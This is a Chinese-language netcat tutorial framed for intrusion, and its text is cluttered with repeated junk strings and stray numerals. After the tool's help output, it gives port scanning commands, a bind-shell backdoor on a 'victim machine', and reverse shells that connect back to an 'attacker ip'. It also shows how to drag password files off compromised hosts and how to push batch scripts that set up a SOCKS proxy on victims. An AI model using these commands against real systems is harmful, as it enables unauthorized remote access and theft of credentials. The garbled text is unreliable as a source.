瑞士军刀NC教程
1
[z'G)v 1
[z'G)v 1
[z'G)v 黑客瑞士军刀NC使用教程
1
[z'G)v 1
[z'G)v 1. 写在前面的话
1
[z'G)v 1
[z'G)v ######################################################################
1
[z'G)v 1
[z'G)v NC这个黑客必备的武器,被称为”瑞士军刀”可见功能之强大.
1
[z'G)v 1
[z'G)v 对比win2000微软的telnet.exe和微软的tlntsvr.exe服务,连接的时候就可以看出来了.
1
[z'G)v 1
[z'G)v 1.1 NC.EXE是一个非标准的telnet客户端程序,
1
[z'G)v 1
[z'G)v 1.2 还有一个putty.exe客户端程序,提供四种连接模式
1
[z'G)v 1
[z'G)v -raw -telnet -rlogin -ssh.
1
[z'G)v 1
[z'G)v 虽然现在也新出了GUI版的中文“NC”,但是相比起来还是这个好用。
1
[z'G)v 1
[z'G)v ######################################################################
1
[z'G)v 1
[z'G)v 2. Netcat 1.10 for NT 帮助信息
1
[z'G)v 1
[z'G)v ######################################################################
1
[z'G)v 1
[z'G)v C:\WINDOWS\Desktop>nc -h
1
[z'G)v 1
[z'G)v [v1.10 NT]
1
[z'G)v 1
[z'G)v connect to somewhere: nc [-options] hostname port[s] [ports] ...
1
[z'G)v 1
[z'G)v listen for inbound: nc -l -p port [options] [hostname] [port]
1
[z'G)v 1
[z'G)v options:
1
[z'G)v 1
[z'G)v -d detach from console, background mode (后台模式)
1
[z'G)v 1
[z'G)v -e prog inbound program to exec [dangerous!!]
1
[z'G)v 1
[z'G)v -g gateway source-routing hop point[s], up to 8
1
[z'G)v 1
[z'G)v -G num source-routing pointer: 4, 8, 12, ...
1
[z'G)v 1
[z'G)v -h this cruft (本帮助信息)
1
[z'G)v 1
[z'G)v -i secs delay interval for lines sent, ports scanned (延迟时间)
1
[z'G)v 1
[z'G)v -l listen mode, for inbound connects (监听模式,等待连接)
1
[z'G)v 1
[z'G)v -L listen harder, re-listen on socket close (连接关闭后,仍然继续监听)
1
[z'G)v 1
[z'G)v -n numeric-only IP addresses, no DNS (ip数字模式,非dns解析)
1
[z'G)v 1
[z'G)v -o file hex dump of traffic (十六进制模式输出文件,三段)
1
[z'G)v 1
[z'G)v -p port local port number (本地端口)
1
[z'G)v 1
[z'G)v -r randomize local and remote ports (随机本地远程端口)
1
[z'G)v 1
[z'G)v -s addr local source address (本地源地址)
1
[z'G)v 1
[z'G)v -t answer TELNET negotiation
1
[z'G)v 1
[z'G)v -u UDP mode
1
[z'G)v 1
[z'G)v -v verbose [use twice to be more verbose] (-vv 更多信息)
1
[z'G)v 1
[z'G)v -w secs timeout for connects and final net reads
1
[z'G)v 1
[z'G)v -z zero-I/O mode [used for scanning] (扫描模式,-vv)
1
[z'G)v 1
[z'G)v port numbers can be individual or ranges: m-n [inclusive]
1
[z'G)v ######################################################################
1
[z'G)v 1
[z'G)v 3. Netcat 1.10 常用的命令格式
1
[z'G)v 1
[z'G)v ######################################################################
1
[z'G)v 1
[z'G)v 3.1.端口的刺探:
1
[z'G)v 1
[z'G)v nc -vv ip port
1
[z'G)v 1
[z'G)v RIVER [192.168.0.198] 19190 (?) open //显示是否开放open
1
[z'G)v 1
[z'G)v 1
[z'G)v 1
[z'G)v 3.2.扫描器
1
[z'G)v 1
[z'G)v nc -vv -w 5 ip port-port port
1
[z'G)v bqEQP3t^ nc -vv -z ip port-port port
bqEQP3t^ bqEQP3t^ 这样扫描会留下大量的痕迹,系统管理员会额外小心
bqEQP3t^ bqEQP3t^ bqEQP3t^ bqEQP3t^ 3.3. 后门
bqEQP3t^ bqEQP3t^ victim machine: //受害者的机器
bqEQP3t^ bqEQP3t^ nc -l -p port -e cmd.exe //win2000
bqEQP3t^ bqEQP3t^ nc -l -p port -e /bin/sh //unix,linux
bqEQP3t^ bqEQP3t^ attacker machine: //攻击者的机器.
bqEQP3t^ bqEQP3t^ nc ip -p port //连接victim_IP,然后得到一个shell。
bqEQP3t^ bqEQP3t^ bqEQP3t^ bqEQP3t^ 3.4.反向连接
bqEQP3t^ bqEQP3t^ attacker machine: //一般是sql2.exe,远程溢出,webdavx3.exe攻击.
bqEQP3t^ bqEQP3t^ //或者wollf的反向连接.
bqEQP3t^ bqEQP3t^ nc -vv -l -p port
bqEQP3t^ bqEQP3t^ victim machine:
bqEQP3t^ bqEQP3t^ nc -e cmd.exe attacker ip -p port
bqEQP3t^ bqEQP3t^ nc -e /bin/sh attacker ip -p port
bqEQP3t^ bqEQP3t^ bqEQP3t^ bqEQP3t^ 或者:
bqEQP3t^ bqEQP3t^ attacker machine:
bqEQP3t^ bqEQP3t^ nc -vv -l -p port1 /*用于输入*/
bqEQP3t^ bqEQP3t^ nc -vv -l -p prot2 /*用于显示*/
bqEQP3t^ bqEQP3t^ victim machine:
bqEQP3t^ bqEQP3t^ nc attacker_ip port1 cmd.exe nc attacker_ip port2
bqEQP3t^ bqEQP3t^ nc attacker_ip port1 /bin/sh nc attacker_ip port2
bqEQP3t^ bqEQP3t^ bqEQP3t^ bqEQP3t^ 139要加参数-s(nc.exe -L -p 139 -d -e cmd.exe -s 对方机器IP)
bqEQP3t^ bqEQP3t^ 这样就可以保证nc.exe优先于NETBIOS。
bqEQP3t^ 3.5.传送文件:
bqEQP3t^ bqEQP3t^ 3.5.1 attacker machine <-- victim machine //从肉鸡拖密码文件回来.
bqEQP3t^ bqEQP3t^ nc -d -l -p port < path\filedest /*attacker machine*/ 可以shell执行
bqEQP3t^ bqEQP3t^ nc -vv attacker_ip port > path\file.txt /*victim machine*/ 需要Ctrl C退出
bqEQP3t^ bqEQP3t^ //肉鸡需要gui界面的cmd.exe里面执行(终端登陆,不如安装FTP方便).否则没有办法输入Crl C.
bqEQP3t^ bqEQP3t^ bqEQP3t^ bqEQP3t^ 3.5.2 attacker machine victim machine //上传命令文件到肉鸡
bqEQP3t^ bqEQP3t^ nc -vv -l -p port > path\file.txt /*victim machine*/ 需要Ctrl C退出
bqEQP3t^ bqEQP3t^ nc -d victim_ip port < path\filedest /*attacker machine*/ 可以shell执行
bqEQP3t^ bqEQP3t^ //这样比较好.我们登陆终端.入侵其他的肉鸡.可以选择shell模式登陆.
bqEQP3t^ bqEQP3t^ bqEQP3t^ bqEQP3t^ 结论: 可以传输ascii,bin文件.可以传输程序文件.
bqEQP3t^ bqEQP3t^ bqEQP3t^ bqEQP3t^ 问题:连接某个ip后,传送完成后,需要发送Ctrl C退出nc.exe .
bqEQP3t^ bqEQP3t^ 或者只有再次连接使用pskill.exe 杀掉进程.但是是否释放传输文件打开的句柄了?
bqEQP3t^ bqEQP3t^ bqEQP3t^ bqEQP3t^ bqEQP3t^ bqEQP3t^ 3.6 端口数据抓包.
bqEQP3t^ bqEQP3t^ nc -vv -w 2 -o test.txt
www.hackervip.com 80 21-15
bqEQP3t^ bqEQP3t^ bqEQP3t^ bqEQP3t^ < 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error
bqEQP3t^ bqEQP3t^ < 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" unr
bqEQP3t^ bqEQP3t^ < 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a # ecognized...
bqEQP3t^ bqEQP3t^ < 00000084 83 00 00 01 8f # .....
bqEQP3t^ bqEQP3t^ bqEQP3t^ bqEQP3t^ bqEQP3t^ bqEQP3t^ 3.7 telnet,自动批处理。
bqEQP3t^ bqEQP3t^ nc victim_ip port < path\file.cmd /*victim machine*/ 显示执行过程.
bqEQP3t^ bqEQP3t^ nc -vv victim_ip port < path\file.cmd /*victim machine*/ 显示执行过程.
bqEQP3t^ bqEQP3t^ bqEQP3t^ bqEQP3t^ nc -d victim_ip port < path\file.cmd 安静模式.
bqEQP3t^ bqEQP3t^ bqEQP3t^ bqEQP3t^ _______________file.cmd________________________
bqEQP3t^ bqEQP3t^ password
bqEQP3t^ bqEQP3t^ cd %windir%
bqEQP3t^ bqEQP3t^ echo []=[%windir%]
bqEQP3t^ bqEQP3t^ c:
bqEQP3t^ bqEQP3t^ cd \
bqEQP3t^ bqEQP3t^ md test
bqEQP3t^ bqEQP3t^ cd /d %windir%\system32\
bqEQP3t^ bqEQP3t^ net stop sksockserver
bqEQP3t^ bqEQP3t^ snake.exe -config port 11111
bqEQP3t^ bqEQP3t^ net start sksockserver
bqEQP3t^ bqEQP3t^ exit
bqEQP3t^ bqEQP3t^